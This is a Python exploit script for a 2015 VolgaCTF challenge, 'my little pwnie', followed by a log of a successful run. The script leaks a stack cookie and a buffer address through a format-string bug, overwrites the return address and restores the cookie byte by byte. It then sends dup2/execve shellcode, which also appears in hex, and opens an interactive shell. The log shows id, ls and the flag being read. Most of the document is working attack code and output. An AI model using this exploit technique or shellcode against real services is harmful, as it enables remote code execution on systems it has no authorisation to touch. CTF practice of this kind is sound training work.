Exploit Little Pwnie VolgaCTF
#!/usr/bin/env python | |
import struct, sys, time, re | |
from nulllife import * | |
import requests, urllib | |
# Volga CTF 2015 | |
# exploit my little pwnie | |
# www.null-life.com / @_g05u_ | |
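FD = 4  # fd the service talks to us on; the dup2 shellcode wires it to stdin/stdout/stderr
s = NullSocket('pwnie.2015.volgactf.ru', 7777)
#s = NullSocket('kali64', 1337)   # author's local test harness, kept for reference

# Payload geometry. Every number below (the printf argument indexes 26 and 6,
# the 0x70 offset, the 138/122 padding widths and the 58-byte shellcode size)
# was derived for the my_little_pwnie binary served at the CTF and is not
# discovered at runtime -- re-measure all of them for any other build.
SHELLCODE_LEN = 58

shellcode = NullShell('dup2').get(FD) + NullShell('exec').get()
# rjust() pads but never truncates: a longer shellcode would silently change
# the length of the final write, so refuse rather than send an unexpected layout.
if len(shellcode) > SHELLCODE_LEN:
    sys.exit('[-] shellcode is %d bytes, expected at most %d' % (len(shellcode), SHELLCODE_LEN))
shellcode = shellcode.rjust(SHELLCODE_LEN, '\x90')  # NOP sled in front

_HEX = re.compile(r'0x[0-9a-fA-F]+')


def wait_prompt():
    """Block until the echo server asks for input; return everything read before the prompt."""
    return s.readuntil('back: ')


def leak(fmt):
    """Send a printf-style probe and return the first 0x-prefixed hex value echoed back.

    The server formats our input with printf, so '%N$08x' prints the N-th
    stack argument. Exits with a readable message when the reply carries no
    hex number instead of dying on ValueError/IndexError while slicing it.
    """
    s.writeline(fmt)
    reply = s.readline()
    m = _HEX.search(reply)
    if m is None:
        sys.exit('[-] no hex value in reply to %r: %r' % (fmt, reply))
    return int(m.group(0), 16)


print(wait_prompt())  # server banner
cookie = leak('0x%26$08x')
print('[*] Cookie: 0x%08x' % cookie)
# The cookie is rebuilt below as (cookie + 1) with its low byte then zeroed,
# which only yields the original value if that low byte was 0x00 to begin with.
if cookie & 0xff:
    sys.exit('[-] cookie low byte is not NUL (0x%08x); the two-step rewrite would corrupt it' % cookie)

wait_prompt()
# The buffer the final write lands in is taken to sit 0x70 below the leaked pointer.
shellcode_addr = leak('0x%6$08x') - 0x70
print('[*] Shellcode Address: 0x%08x' % shellcode_addr)

print('[*] Overwrite RET')
wait_prompt()
# 138 bytes of printf padding + 16 filler bytes reach the saved return
# address, which is pointed into the NOP sled. chr(FD) trails the address;
# NOTE(review): its purpose is not visible from this script -- kept as the
# author had it.
s.write('%138x' + 'A' * 16 + struct.pack('<I', shellcode_addr) + chr(FD))

print('[*] Overwrite cookie')
wait_prompt()
# Two-step cookie write, presumably because the server's copy stops at a NUL
# and the real cookie ends in 0x00: first land cookie+1 (low byte 0x01) at
# offset 122, NUL-terminated ...
s.write('%122x' + struct.pack('<I', cookie + 1) + '\x00')

print('[*] Overwrite null byte in cookie')
wait_prompt()
# ... then send exactly 122 bytes so this write's own terminating NUL lands
# on the 0x01, restoring the genuine cookie.
s.write('%122x')

print('[*] Write shellcode')
wait_prompt()
print('[!] Shellcode: %s' % shellcode.encode('hex'))
s.write(shellcode + '\x00')  # NOP sled + shellcode into the buffer RET now points at

print('[***] Got shell!!!')  # optimistic: nothing above confirms the return actually happened
s.interactive()
'''
$ python xpl_pony.py
This is a simple echo server. Type exit to quit.
Type string to echo back:
[*] Cookie: 0x5b1a5400
[*] Shellcode Address: 0xffcadbfc
[*] Overwrite RET
[*] Overwrite cookie
[*] Overwrite null byte in cookie
[*] Write shellcode
[!] Shellcode: 909090909090909090909090909090909031db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
[***] Got shell!!!
I strip this awful symbol
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),102(netdev)
ls -la
total 908
drwxrwxr-x 2 ubuntu ubuntu 4096 May 3 05:33 .
drwxr-xr-x 5 ubuntu ubuntu 4096 May 3 05:24 ..
-rwxrwxr-x 1 ubuntu ubuntu 9720 May 3 05:24 my_little_pwnie
-rw-rw-r-- 1 ubuntu ubuntu 28 May 3 05:24 you_can_find_flag_in_this_file.txt
-rw-r--r-- 1 root root 900476 May 3 10:52 zzz_logs
cat you_can_find_flag_in_this_file.txt
flag{fmt_string+bof=exploit}
exit
*** Connection closed by remote host ***
'''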